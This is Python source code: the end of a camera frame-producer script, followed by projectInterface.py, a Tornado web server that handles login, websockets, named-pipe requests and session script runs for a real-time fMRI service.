configDict[CID+"fps"] = double(lElem[1])
configDict[CID+"p1x"] = int(lElem[2])
configDict[CID+"p1y"] = int(lElem[3])
configDict[CID+"p2x"] = int(lElem[4])
configDict[CID+"p2y"] = int(lElem[5])
configDict[CID+"mode"] = str(lElem[6])
if configDict[CID+"mode"] == "single":
configDict[CID+"stop"] = True
else:
configDict[CID+"stop"] = False
continue
if command == 'start':
print("do start")
CID = (lElem[1])
configDict[CID+"stop"] = False
continue
if command == 'stop':
print("do stop")
CID = (lElem[1])
configDict[CID+"stop"] = True
continue
if command == 'terminate':
print("do terminate")
CID = (lElem[1])
configDict[CID+"terminate"] = True
continue
if command == 'single':
print("do single picture")
CID = (lElem[7])
if CID not in clients:
print("potential NEW consumer!")
callRegistry(name)
else:
print("update existing consumer")
configDict[CID+"fps"] = double(lElem[1])
configDict[CID+"p1x"] = int(lElem[2])
configDict[CID+"p1y"] = int(lElem[3])
configDict[CID+"p2x"] = int(lElem[4])
configDict[CID+"p2y"] = int(lElem[5])
configDict[CID+"mode"] = int(lElem[6])
if configDict[CID+"mode"] == "single":
configDict[CID+"stop"] = True
else:
configDict[CID+"stop"] = False
continue
except:
print("exception in conf thread")
bufferlock = threading.Lock()
stop = False
stopMainApp = False
threads = []
clients = []
###### Load Config File ######
name = sys.argv[1]
config = configparser.ConfigParser()
config.sections()
config.read(name + '.ini')
print(">>: ",config['PRODUCER']['Camid'])
camid = int(config['PRODUCER']['Camid']) # id to identify camera (-1 ... file stream)
reghost = str(config['PRODUCER']['RHost']) # registry host
regport = int(config['PRODUCER']['RPort']) # registry port
regportrest = int(config['PRODUCER']['RPortRest']) # registry port rest-api
headless = bool(config['PRODUCER'].getboolean('Headless')) #
print(headless)
if 'reghost' not in locals():
print("set default ports for registry")
CONFIGSERVERIP = "127.0.0.1"
CONFIGSERVERPORT = 9997
CONFIGSERVERRESTPORT = 10000
else:
CONFIGSERVERIP = reghost
CONFIGSERVERPORT = regport
CONFIGSERVERRESTPORT = regportrest
callRegistry(name)
# config Thread (client config)
cthread = threading.Thread(target=configThread, args=(stopMainApp,name))
cthread.start()
# CLI Thread (reads args from commandline during runtime)
cthread = threading.Thread(target=readCLI, args=(stopMainApp,))
#cthread.start()
# capture Thread (reads buffer from camera)
cthread = threading.Thread(target=capture, args=(stopMainApp,name, camid, headless))
cthread.start()
|
projectInterface.py
|
import tornado.web
import tornado.websocket
import os
import time
import ssl
import json
import queue
import logging
import re
import toml
import shlex
import uuid
import bcrypt
import numbers
import asyncio
import threading
import subprocess
from pathlib import Path
from rtCommon.projectUtils import listFilesReqStruct, getFileReqStruct, decodeMessageData
from rtCommon.projectUtils import defaultPipeName, makeFifo, unpackDataMessage
from rtCommon.structDict import StructDict, recurseCreateStructDict
from rtCommon.certsUtils import getCertPath, getKeyPath
from rtCommon.utils import DebugLevels, writeFile, loadConfigFile
from rtCommon.errors import StateError, RequestError, RTError
certsDir = 'certs'
sslCertFile = 'rtcloud.crt'
sslPrivateKey = 'rtcloud_private.key'
CommonOutputDir = '/rtfmriData/'
maxDaysLoginCookieValid = 0.5
moduleDir = os.path.dirname(os.path.realpath(__file__))
rootDir = os.path.dirname(moduleDir)
# Note: User refers to the clinician running the experiment, so userWindow is the main
# browser window for running the experiment.
class Web():
''' Cloud service web-interface that is the front-end to the data processing. '''
app = None
httpServer = None
httpPort = 8888
# Arrays of WebSocket connections that have been established from client windows
wsBrowserMainConns = [] # type: ignore
wsBiofeedbackConns = [] # type: ignore
wsEventConns = [] # type: ignore
wsDataConn = None # type: ignore # Only one data connection
# Callback functions to invoke when message received from client window connection
browserMainCallback = None
browserBiofeedCallback = None
eventCallback = None
# Main html page to load
webDir = os.path.join(rootDir, 'web/')
confDir = os.path.join(webDir, 'conf/')
htmlDir = os.path.join(webDir, 'html')
webIndexPage = 'index.html'
webLoginPage = 'login.html'
webBiofeedPage = 'biofeedback.html'
dataCallbacks = {}
dataSequenceNum = 0
cbPruneTime = 0
# Synchronizing across threads
callbackLock = threading.Lock()
wsConnLock = threading.Lock()
httpLock = threading.Lock()
ioLoopInst = None
filesremote = False
fmriPyScript = None
initScript = None
finalizeScript = None
configFilename = None
cfg = None
testMode = False
runInfo = StructDict({'threadId': None, 'stopRun': False})
resultVals = [[{'x': 0, 'y': 0}]]
@staticmethod
def start(params, cfg, testMode=False):
if Web.app is not None:
raise RuntimeError("Web Server already running.")
Web.testMode = testMode
# Set default value before checking for param overrides
Web.browserMainCallback = defaultBrowserMainCallback
Web.browserBiofeedCallback = defaultBrowserBiofeedCallback
Web.eventCallback = defaultEventCallback
if params.browserMainCallback:
Web.browserMainCallback = params.browserMainCallback
if params.browserBiofeedCallback:
Web.browserBiofeedCallback = params.browserBiofeedCallback
if params.eventCallback:
Web.eventCallback = params.eventCallback
if params.htmlDir:
Web.htmlDir = params.htmlDir
Web.webDir = os.path.dirname(Web.htmlDir)
if params.port:
Web.httpPort = params.port
Web.fmriPyScript = params.fmriPyScript
Web.initScript = params.initScript
Web.finalizeScript = params.finalizeScript
Web.filesremote = params.filesremote
if type(cfg) is str:
Web.configFilename = cfg
cfg = loadConfigFile(Web.configFilename)
Web.cfg = cfg
if not os.path.exists(Web.confDir):
os.makedirs(Web.confDir)
src_root = os.path.join(Web.webDir, 'src')
css_root = os.path.join(Web.webDir, 'css')
img_root = os.path.join(Web.webDir, 'img')
build_root = os.path.join(Web.webDir, 'build')
cookieSecret = getCookieSecret(certsDir)
settings = {
"cookie_secret": cookieSecret,
"login_url": "/login",
"xsrf_cookies": True,
"websocket_max_message_size": 16*1024*1024,
# "max_message_size": 1024*1024*256,
# "max_buffer_size": 1024*1024*256,
}
Web.app = tornado.web.Application([
(r'/', Web.UserHttp),
(r'/login', Web.LoginHandler),
(r'/logout', Web.LogoutHandler),
(r'/feedback', Web.BiofeedbackHttp), # shows image
(r'/wsUser', Web.UserWebSocket),
(r'/wsSubject', Web.BiofeedbackWebSocket),
(r'/wsData', Web.DataWebSocket),
(r'/wsEvents', Web.EventWebSocket), # gets signal to change image
(r'/src/(.*)', tornado.web.StaticFileHandler, {'path': src_root}),
(r'/css/(.*)', tornado.web.StaticFileHandler, {'path': css_root}),
(r'/img/(.*)', tornado.web.StaticFileHandler, {'path': img_root}),
(r'/build/(.*)', tornado.web.StaticFileHandler, {'path': build_root}),
], **settings)
# start event loop if needed
try:
asyncio.get_event_loop()
except RuntimeError as err:
# RuntimeError thrown if no current event loop
# Start the event loop
asyncio.set_event_loop(asyncio.new_event_loop())
# start thread listening for remote file requests on a default named pipe
commPipes = makeFifo(pipename=defaultPipeName)
fifoThread = threading.Thread(name='defaultPipeThread', target=repeatPipeRequestHandler, args=(commPipes,))
fifoThread.setDaemon(True)
fifoThread.start()
if Web.testMode is True:
print("Listening on: http://localhost:{}".format(Web.httpPort))
ssl_ctx = None
else:
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.load_cert_chain(getCertPath(certsDir, sslCertFile),
getKeyPath(certsDir, sslPrivateKey))
print("Listening on: https://localhost:{}".format(Web.httpPort))
Web.httpServer = tornado.httpserver.HTTPServer(Web.app, ssl_options=ssl_ctx)
Web.httpServer.listen(Web.httpPort)
Web.ioLoopInst = tornado.ioloop.IOLoop.current()
Web.ioLoopInst.start()
@staticmethod
def stop():
Web.ioLoopInst.add_callback(Web.ioLoopInst.stop)
Web.app = None
@staticmethod
def close():
# Currently this should never be called
raise StateError("Web close() called")
Web.wsConnLock.acquire()
try:
if Web.wsDataConn is not None:
Web.wsDataConn.close()
Web.wsDataConn = None
for client in Web.wsBrowserMainConns[:]:
client.close()
Web.wsBrowserMainConns = []
for client in Web.wsBiofeedbackConns[:]:
client.close()
Web.wsBiofeedbackConns = []
finally:
Web.wsConnLock.release()
@staticmethod
def dataLog(filename, logStr):
cmd = {'cmd': 'dataLog', 'logLine': logStr, 'filename': filename}
try:
response = Web.sendDataMsgFromThread(cmd, timeout=5)
if response.get('status') != 200:
logging.warning('Web: dataLog: error {}'.format(response.get('error')))
return False
except Exception as err:
logging.warning('Web: dataLog: error {}'.format(err))
return False
return True
@staticmethod
def userLog(logStr):
cmd = {'cmd': 'userLog', 'value': logStr}
Web.sendUserMsgFromThread(json.dumps(cmd))
@staticmethod
def sessionLog(logStr):
cmd = {'cmd': 'sessionLog', 'value': logStr}
Web.sendUserMsgFromThread(json.dumps(cmd))
@staticmethod
def setUserError(errStr):
response = {'cmd': 'error', 'error': errStr}
Web.sendUserMsgFromThread(json.dumps(response))
@staticmethod
def sendUserConfig(config, filename=''):
response = {'cmd': 'config', 'value': config, 'filename': filename}
Web.sendUserMsgFromThread(json.dumps(response))
@staticmethod
def sendUserDataVals(dataPoints):
response = {'cmd': 'dataPoints', 'value': dataPoints}
Web.sendUserMsgFromThread(json.dumps(response))
@staticmethod
def sendDataMsgFromThreadAsync(msg):
if Web.wsDataConn is None:
raise StateError("ProjectInterface: FileServer not connected. Please run the fileServer.")
callId = msg.get('callId')
if not callId:
callbackStruct = StructDict()
callbackStruct.dataConn = Web.wsDataConn
callbackStruct.numResponses = 0
callbackStruct.responses = []
callbackStruct.semaphore = threading.Semaphore(value=0)
callbackStruct.timeStamp = time.time()
callbackStruct.msg = msg.copy()
if 'data' in callbackStruct.msg:
del callbackStruct.msg['data']
Web.callbackLock.acquire()
try:
Web.dataSequenceNum += 1
callId = Web.dataSequenceNum
callbackStruct.callId = callId
msg['callId'] = callId
Web.dataCallbacks[callId] = callbackStruct
finally:
Web.callbackLock.release()
Web.ioLoopInst.add_callback(Web.sendDataMessage, msg)
return callId
@staticmethod
def getDataMsgResponse(callId, timeout=None):
Web.callbackLock.acquire()
try:
callbackStruct = Web.dataCallbacks.get(callId, None)
if callbackStruct is None:
raise StateError('sendDataMsgFromThread: no callbackStruct found for callId {}'.format(callId))
finally:
Web.callbackLock.release()
# wait for semaphore signal indicating a callback for this callId has occured
signaled = callbackStruct.semaphore.acquire(timeout=timeout)
if signaled is False:
raise TimeoutError("sendDataMessage: Data Request Timed Out({}) {}".
format(timeout, callbackStruct.msg))
Web.callbackLock.acquire()
try:
# Remove from front of list not back to stay in order
# Can test removing from back of list to make sure out-of-order works too
response = callbackStruct.responses.pop(0)
if 'data' in response:
status = response.get('status', -1)
numParts = response.get('numParts', 1)
complete = (callbackStruct.numResponses == numParts and len(callbackStruct.responses) == 0)
if complete or status != 200:
# End the multipart transfer
response['incomplete'] = False
Web.dataCallbacks.pop(callId, None)
else:
response['incomplete'] = True
except IndexError:
raise StateError('sendDataMessage: callbackStruct.response is None for command {}'.
format(callbackStruct.msg))
finally:
Web.callbackLock.release()
response['callId'] = callbackStruct.callId
return response
@staticmethod
def sendDataMsgFromThread(msg, timeout=None):
callId = Web.sendDataMsgFromThreadAsync(msg)
response = Web.getDataMsgResponse(callId, timeout=timeout)
return response
@staticmethod
def sendDataMessage(cmd):
''' This function is called within the ioloop thread by scheduling the call'''
Web.wsConnLock.acquire()
try:
msg = json.dumps(cmd)
Web.wsDataConn.write_message(msg)
except Exception as err:
errStr = 'sendDataMessage error: type {}: {}'.format(type(err), str(err))
raise RTError(errStr)
finally:
Web.wsConnLock.release()
@staticmethod
def dataCallback(client, message):
response = json.loads(message)
if 'cmd' not in response:
raise StateError('dataCallback: cmd field missing from response: {}'.format(response))
if 'status' not in response:
raise StateError('dataCallback: status field missing from response: {}'.format(response))
if 'callId' not in response:
raise StateError('dataCallback: callId field missing from response: {}'.format(response))
status = response.get('status', -1)
callId = response.get('callId', -1)
origCmd = response.get('cmd', 'NoCommand')
logging.log(DebugLevels.L6, "callback {}: {} {}".format(callId, origCmd, status))
# Thread Synchronized Section
Web.callbackLock.acquire()
try:
callbackStruct = Web.dataCallbacks.get(callId, None)
if callbackStruct is None:
logging.error('ProjectInterface: dataCallback callId {} not found, current callId {}'
.format(callId, Web.dataSequenceNum))
return
if callbackStruct.callId != callId:
# This should never happen
raise StateError('callId mismtach {} {}'.format(callbackStruct.callId, callId))
callbackStruct.responses.append(response)
callbackStruct.numResponses += 1
callbackStruct.semaphore.release()
except Exception as err:
logging.error('ProjectInterface: dataCallback error: {}'.format(err))
raise err
finally:
Web.callbackLock.release()
if time.time() > Web.cbPruneTime:
Web.cbPruneTime = time.time() + 60
Web.pruneCallbacks()
@staticmethod
def pruneCallbacks():
numWaitingCallbacks = len(Web.dataCallbacks)
if numWaitingCallbacks == 0:
return
logging.info('Web pruneCallbacks: checking {} callbaks'.format(numWaitingCallbacks))
Web.callbackLock.acquire()
try:
maxSeconds = 300
now = time.time()
for callId in Web.dataCallbacks.keys():
# check how many seconds old each callback is
cb = Web.dataCallbacks[callId]
secondsElapsed = now - cb.timeStamp
if secondsElapsed > maxSeconds:
# older than max threshold so remove
cb.status = 400
cb.error = 'Callback time exceeded max threshold {}s {}s'.format(maxSeconds, secondsElapsed)
cb.responses.append({'cmd': 'unknown', 'status': cb.status, 'error': cb.error})
for i in range(len(cb.responses)):
cb.semaphore.release()
del Web.dataCallbacks[callId]
except Exception as err:
logging.error('Web pruneCallbacks: error {}'.format(err))
finally:
Web.callbackLock.release()
@staticmethod
def sendUserMsgFromThread(msg):
Web.ioLoopInst.add_callback(Web.sendUserMessage, msg)
@staticmethod
def sendUserMessage(msg):
Web.wsConnLock.acquire()
try:
for client in Web.wsBrowserMainConns:
client.write_message(msg)
finally:
Web.wsConnLock.release()
@staticmethod
def sendBiofeedbackMsgFromThread(msg):
Web.ioLoopInst.add_callback(Web.sendBiofeedbackMessage, msg)
@staticmethod
def sendBiofeedbackMessage(msg):
Web.wsConnLock.acquire()
try:
for client in Web.wsBiofeedbackConns:
client.write_message(msg)
finally:
Web.wsConnLock.release()
@staticmethod
def addResultValue(request):
cmd = request.get('cmd')
if cmd != 'resultValue':
logging.warn('addResultValue: wrong cmd type {}'.format(cmd))
return
runId = request.get('runId')
x = request.get('trId')
y = request.get('value')
if not isinstance(runId, numbers.Number) or runId <= 0:
logging.warn('addResultValue: runId wrong val {}'.format(cmd))
return
# Make sure resultVals has at least as many arrays as runIds
for i in range(len(Web.resultVals), runId):
Web.resultVals.append([])
if not isinstance(x, numbers.Number):
# clear plot for this runId
Web.resultVals[runId-1] = []
return
# logging.info("Add resultVal {}, {}".format(x, y))
runVals = Web.resultVals[runId-1]
for i, val in enumerate(runVals):
if val['x'] == x:
runVals[i] = {'x': x, 'y': y}
return
runVals.append({'x': x, 'y': y})
class UserHttp(tornado.web.RequestHandler):
def get_current_user(self):
return self.get_secure_cookie("login", max_age_days=maxDaysLoginCookieValid)
@tornado.web.authenticated
def get(self):
full_path = os.path.join(Web.htmlDir, Web.webIndexPage)
logging.log(DebugLevels.L6, 'Index request: pwd: {}'.format(full_path))
Web.httpLock.acquire()
try:
self.render(full_path)
finally:
Web.httpLock.release()
class BiofeedbackHttp(tornado.web.RequestHandler):
def get_current_user(self):
return self.get_secure_cookie("login", max_age_days=maxDaysLoginCookieValid)
@tornado.web.authenticated
def get(self):
full_path = os.path.join(Web.htmlDir, Web.webBiofeedPage)
logging.log(DebugLevels.L6, 'Subject feedback http request: pwd: {}'.format(full_path))
Web.httpLock.acquire()
try:
self.render(full_path)
finally:
Web.httpLock.release()
class LoginHandler(tornado.web.RequestHandler):
loginAttempts = {}
loginRetryDelay = 10
def get(self):
params = {
"error_msg": '',
"nextpage": self.get_argument("next", "/")
}
full_path = os.path.join(Web.htmlDir, Web.webLoginPage)
self.render(full_path, **params)
def post(self):
errorReply = None
try:
login_name = self.get_argument("name")
login_passwd = self.get_argument("password")
if Web.testMode is True:
if login_name == login_passwd == 'test':
self.set_secure_cookie("login", login_name, expires_days=maxDaysLoginCookieValid)
self.redirect(self.get_query_argument('next', '/'))
return
passwdFilename = os.path.join(certsDir, 'passwd')
passwdDict = loadPasswdFile(passwdFilename)
if login_name in passwdDict:
errorReply = self.checkRetry(login_name)
if errorReply is None:
hashed_passwd = passwdDict[login_name]
# checkpw expects bytes array rather than string so use .encode()
if bcrypt.checkpw(login_passwd.encode(), hashed_passwd.encode()) is True:
# Remove failed attempts entry
del Web.LoginHandler.loginAttempts[login_name]
self.set_secure_cookie("login", login_name, expires_days=maxDaysLoginCookieValid)
self.redirect(self.get_query_argument('next', '/'))
return
else:
errorReply = 'Login Error: Login Incorrect'
else:
errorReply = self.checkRetry('invalid_user')
if errorReply is None:
errorReply = 'Login Error: Login Incorrect'
except Exception as err:
errorReply = 'Exception: {} {}'.format(type(err), err)
assert errorReply is not None, "Assert: Web.LoginHandler.error not empty"
logging.warning('Login Failure: {}'.format(login_name))
params = {
"error_msg": errorReply,
"nextpage": self.get_query_argument('next', '/')
}
full_path = os.path.join(Web.htmlDir, Web.webLoginPage)
self.render(full_path, **params)
def checkRetry(self, user):
'''Keep a dictionary with one entry per username. Any user not in the
passwd file will be entered as 'invalid_user'. Record login failure
count and timestamp for when the next retry is allowed. Reset failed
retry count on successful login. Return message with how many seconds
until next login attempt is allowed.
'''
now = time.time()
loginAttempts = Web.LoginHandler.loginAttempts
retryTime = now + Web.LoginHandler.loginRetryDelay
loginTry = loginAttempts.get(user)
if loginTry is not None:
failedLogins = loginTry.get('failedLogins', 0)
nextAllowedTime = loginTry.get('nextAllowedTime', now)
# print('user: {}, tries {}, nextTime {}'.format(user, failedLogins, nextAllowedTime))
if nextAllowedTime > now:
delaySecs = loginTry['nextAllowedTime'] - now
return 'Next login retry allowed in {} sec'.format(int(delaySecs))
loginTry['failedLogins'] = failedLogins + 1
loginTry['nextAllowedTime'] = retryTime
loginAttempts[user] = loginTry
else:
loginAttempts[user] = {'failedLogins': 1, 'nextAllowedTime': retryTime}
return None
class LogoutHandler(tornado.web.RequestHandler):
def get(self):
self.clear_cookie("login")
self.redirect("/login")
class BiofeedbackWebSocket(tornado.websocket.WebSocketHandler):
# TODO - combine these in-common setups into helper functions
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
response = {'cmd': 'error', 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "Biofeedback WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
Web.wsBiofeedbackConns.append(self)
finally:
Web.wsConnLock.release()
def on_close(self):
logging.log(DebugLevels.L1, "Biofeedback WebSocket closed")
Web.wsConnLock.acquire()
try:
if self in Web.wsBiofeedbackConns:
Web.wsBiofeedbackConns.remove(self)
finally:
Web.wsConnLock.release()
def on_message(self, message):
Web.browserBiofeedCallback(self, message)
class UserWebSocket(tornado.websocket.WebSocketHandler):
# def get(self, *args, **kwargs):
# if self.get_secure_cookie("login"):
# super(Web.BiofeedbackWebSocket, self).get(*args, **kwargs)
# else:
# What to do here when authentication fails?
# return
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
response = {'cmd': 'error', 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "User WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
Web.wsBrowserMainConns.append(self)
finally:
Web.wsConnLock.release()
def on_close(self):
logging.log(DebugLevels.L1, "User WebSocket closed")
Web.wsConnLock.acquire()
try:
if self in Web.wsBrowserMainConns:
Web.wsBrowserMainConns.remove(self)
else:
logging.log(DebugLevels.L1, "on_close: connection not in list")
finally:
Web.wsConnLock.release()
def on_message(self, message):
Web.browserMainCallback(self, message)
class EventWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
response = {'cmd': 'error', 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "Event WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
Web.wsEventConns.append(self)
finally:
Web.wsConnLock.release()
def on_close(self):
logging.log(DebugLevels.L1, "Event WebSocket closed")
Web.wsConnLock.acquire()
try:
if self in Web.wsEventConns:
Web.wsEventConns.remove(self)
finally:
Web.wsConnLock.release()
def on_message(self, message):
Web.eventCallback(self, message)
class DataWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
logging.warning('Data websocket authentication failed')
response = {'cmd': 'error', 'status': 401, 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "Data WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
# temporarily cache any previous connection
prevDataConn = Web.wsDataConn
# add new connection
Web.wsDataConn = self
# If there was a previous connection close it
if prevDataConn is not None:
prevDataConn.close()
except Exception as err:
logging.error('ProjectInterface: Open Data Socket error: {}'.format(err))
finally:
Web.wsConnLock.release()
print('DataWebSocket: connected {}'.format(self.request.remote_ip))
def on_close(self):
if Web.wsDataConn == self:
Web.wsConnLock.acquire()
Web.wsDataConn = None
Web.wsConnLock.release()
logging.log(DebugLevels.L1, "Data WebSocket closed")
else:
logging.log(DebugLevels.L1, "on_close: Data WebSocket mismatch")
self.close_pending_requests()
def close_pending_requests(self):
Web.callbackLock.acquire()
try:
# signal the close to anyone waiting for replies
callIdsToRemove = []
for callId, cb in Web.dataCallbacks.items():
if cb.dataConn == self:
callIdsToRemove.append(callId)
cb.status = 499
cb.error = 'Client closed connection'
# TODO - check this logic
cb.responses.append({'cmd': 'unknown', 'status': cb.status, 'error': cb.error})
for i in range(len(cb.responses)):
cb.semaphore.release()
for callId in callIdsToRemove:
Web.dataCallbacks.pop(callId, None)
finally:
Web.callbackLock.release()
def on_message(self, message):
try:
Web.dataCallback(self, message)
except Exception as err:
logging.error('DataWebSocket: on_message error: {}'.format(err))
def loadPasswdFile(filename):
with open(filename, 'r') as fh:
entries = fh.readlines()
passwdDict = {k: v for (k, v) in [line.strip().split(',') for line in entries]}
return passwdDict
def storePasswdFile(filename, passwdDict):
with open(filename, 'w') as fh:
for k, v in passwdDict.items():
fh.write('{},{}\n'.format(k, v))
def getCookieSecret(dir):
filename = os.path.join(dir, 'cookie-secret')
if os.path.exists(filename):
with open(filename, mode='rb') as fh:
cookieSecret = fh.read()
else:
cookieSecret = uuid.uuid4().bytes
with open(filename, mode='wb') as fh:
fh.write(cookieSecret)
return cookieSecret
#####################
# Callback Functions
#####################
def defaultBrowserMainCallback(client, message):
request = json.loads(message)
if 'config' in request:
# Common code for any command that sends config information - retrieve the config info
cfgData = request['config']
newCfg = recurseCreateStructDict(cfgData)
if newCfg is not None:
Web.cfg = newCfg
else:
if cfgData is None:
errStr = 'browserMainCallback: Config field is None'
elif type(cfgData) not in (dict, list):
errStr = 'browserMainCallback: Config field wrong type {}'.format(type(cfgData))
else:
errStr = 'browserMainCallback: Error parsing config field {}'.format(cfgData)
Web.setUserError(errStr)
return
cmd = request['cmd']
logging.log(DebugLevels.L3, "WEB USER CMD: %s", cmd)
if cmd == "getDefaultConfig":
# TODO - may need to remove certain fields that can't be jsonified
if Web.configFilename is not None and Web.configFilename != '':
cfg = loadConfigFile(Web.configFilename)
else:
cfg = Web.cfg
Web.sendUserConfig(cfg, filename=Web.configFilename)
elif cmd == "getDataPoints":
Web.sendUserDataVals(Web.resultVals)
elif cmd == "clearDataPoints":
Web.resultVals = [[{'x': 0, 'y': 0}]]
elif cmd == "run" or cmd == "initSession" or cmd == "finalizeSession":
if Web.runInfo.threadId is not None:
Web.runInfo.threadId.join(timeout=1)
if Web.runInfo.threadId.is_alive():
Web.setUserError("Client thread already runnning, skipping new request")
return
Web.runInfo.threadId = None
Web.runInfo.stopRun = False
if cmd == 'run':
sessionScript = Web.fmriPyScript
tag = 'running'
logType = 'run'
elif cmd == 'initSession':
sessionScript = Web.initScript
tag = 'initializing'
logType = 'prep'
elif cmd == "finalizeSession":
sessionScript = Web.finalizeScript
tag = 'finalizing'
logType = 'prep'
if sessionScript is None or sessionScript == '':
Web.setUserError("{} script not set".format(cmd))
return
Web.runInfo.threadId = threading.Thread(name='sessionThread', target=runSession,
args=(Web.cfg, sessionScript,
Web.filesremote, tag, logType))
Web.runInfo.threadId.setDaemon(True)
Web.runInfo.threadId.start()
elif cmd == "stop":
if Web.runInfo.threadId is not None:
Web.runInfo.stopRun = True
Web.runInfo.threadId.join(timeout=1)
if not Web.runInfo.threadId.is_alive():
Web.runInfo.threadId = None
Web.runInfo.stopRun = False
elif cmd == "uploadFiles":
if Web.runInfo.uploadThread is not None:
Web.runInfo.uploadThread.join(timeout=1)
if Web.runInfo.uploadThread.is_alive():
Web.setUserError("Upload thread already runnning, skipping new request")
return
Web.runInfo.uploadThread = threading.Thread(name='uploadFiles',
target=uploadFiles,
args=(request,))
Web.runInfo.uploadThread.setDaemon(True)
Web.runInfo.uploadThread.start()
else:
Web.setUserError("unknown command " + cmd)
def defaultBrowserBiofeedCallback(client, message):
request = json.loads(message)
cmd = request['cmd']
logging.log(DebugLevels.L3, "WEB SUBJ CMD: %s", cmd)
print('Subject Callback: {}'.format(cmd))
def defaultEventCallback(client, message):
request = json.loads(message)
cmd = request['cmd']
logging.log(DebugLevels.L3, "WEB EVENT CMD: %s", cmd)
print('Event Callback: {}'.format(cmd))
def runSession(cfg, pyScript, filesremote, tag, logType='run'):
# write out config file for use by pyScript
if logType == 'run':
configFileName = os.path.join(Web.confDir, 'cfg_sub{}_day{}_run{}.toml'.
format(cfg.subjectName, cfg.subjectDay, cfg.runNum[0]))
else:
configFileName = os.path.join(Web.confDir, 'cfg_sub{}_day{}_{}.toml'.
format(cfg.subjectName, cfg.subjectDay, tag))
with open(configFileName, 'w+') as fd:
toml.dump(cfg, fd)
# specify -u python option to disable buffering print commands
cmdStr = 'python -u {} -c {}'.format(pyScript, configFileName)
# set option for remote file requests
if filesremote is True:
cmdStr += ' -x'
# Create a project commPipe even if using local files so we can send
# classification results to the subject feedback window
commPipes = makeFifo()
cmdStr += ' --commpipe {}'.format(commPipes.fifoname)
# start thread listening for remote file requests on fifo queue
fifoThread = threading.Thread(name='fifoThread', target=commPipeRequestHandler, args=(commPipes,))
fifoThread.setDaemon(True)
fifoThread.start()
# print(cmdStr)
cmd = shlex.split(cmdStr)
proc = subprocess.Popen(cmd, cwd=rootDir, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
# send running status to user web page
response = {'cmd': 'runStatus', 'status': tag}
Web.sendUserMsgFromThread(json.dumps(response))
# start a separate thread to read the process output
lineQueue = queue.Queue()
outputThread = threading.Thread(target=procOutputReader, args=(proc, lineQueue))
outputThread.setDaemon(True)
outputThread.start()
line = 'start'
while(proc.poll() is None or line != ''):
# subprocess poll returns None while subprocess is running
if Web.runInfo.stopRun is True:
# signal the process to exit by closing stdin
proc.stdin.close()
try:
line = lineQueue.get(block=True, timeout=1)
except queue.Empty:
line = ''
if line != '':
if logType == 'run':
Web.userLog(line)
else:
Web.sessionLog(line)
logging.info(line.rstrip())
# processing complete, set status
endStatus = tag + ' complete \u2714'
if Web.runInfo.stopRun is True:
endStatus = 'stopped'
response = {'cmd': 'runStatus', 'status': endStatus}
Web.sendUserMsgFromThread(json.dumps(response))
outputThread.join(timeout=1)
if outputThread.is_alive():
print("OutputThread failed to exit")
# make sure fifo thread has exited
if fifoThread is not None:
signalFifoExit(fifoThread, commPipes)
return
def procOutputReader(proc, lineQueue):
for bline in iter(proc.stdout.readline, b''):
line = bline.decode('utf-8')
# check if line has error in it and print to console
if re.search('error', line, re.IGNORECASE):
print(line)
# send to output queue
lineQueue.put(line)
if line == '':
break
def repeatPipeRequestHandler(commPipes):
while True:
commPipeRequestHandler(commPipes)
def commPipeRequestHandler(commPipes):
'''A thread routine that listens for requests from a process through a pair of named pipes.
This allows another process to send project requests without directly integrating
the projectInterface into the process.
Listens on an fd_in pipe for requests and writes the results back on the fd_out pipe.
'''
commPipes.fd_out = open(commPipes.name_out, mode='w', buffering=1)
commPipes.fd_in = open(commPipes.name_in, mode='r')
try:
while True:
msg = commPipes.fd_in.readline()
if len(msg) == 0:
# fifo closed
break
# parse command
cmd = json.loads(msg)
response = processPyScriptRequest(cmd)
try:
commPipes.fd_out.write(json.dumps(response) + os.linesep)
except BrokenPipeError:
print('handleFifoRequests: pipe broken')
break
# End while loop
finally:
logging.info('handleFifo thread exit')
commPipes.fd_in.close()
commPipes.fd_out.close()
def processPyScriptRequest(request):
if 'cmd' not in request:
raise StateError('handleFifoRequests: cmd field not in request: {}'.format(request))
cmd = request['cmd']
route = request.get('route')
localtimeout = request.get('timeout', 10) + 5
response = StructDict({'status': 200})
if route == 'dataserver':
try:
response = Web.sendDataMsgFromThread(request, timeout=localtimeout)
if response is None:
raise StateError('handleFifoRequests: Response None from sendDataMessage')
if 'status' not in response:
raise StateError('handleFifoRequests: status field missing from response: {}'.format(response))
if response['status'] not in (200, 408):
if 'error' not in response:
raise StateError('handleFifoRequests: error field missing from response: {}'.format(response))
Web.setUserError(response['error'])
logging.error('handleFifo status {}: {}'.format(response['status'], response['error']))
except Exception as err:
errStr = 'SendDataMessage Exception type {}: error {}:'.format(type(err), str(err))
response = {'status': 400, 'error': errStr}
Web.setUserError(errStr)
logging.error('handleFifo Excpetion: {}'.format(errStr))
raise err
else:
if cmd == 'webCommonDir':
response.filename = CommonOutputDir
elif cmd == 'resultValue':
try:
# forward to bioFeedback Display
Web.sendBiofeedbackMsgFromThread(json.dumps(request))
# forward to main browser window
Web.sendUserMsgFromThread(json.dumps(request))
# Accumulate results locally to resend to browser as needed
Web.addResultValue(request)
except Exception as err:
errStr = 'SendClassification Exception type {}: error {}:'.format(type(err), str(err))
response = {'status': 400, 'error': errStr}
Web.setUserError(errStr)
logging.error('handleFifo Excpetion: {}'.format(errStr))
raise err
elif cmd == 'subjectDisplay':
logging.info('subjectDisplay projectInterface Callback')
return response
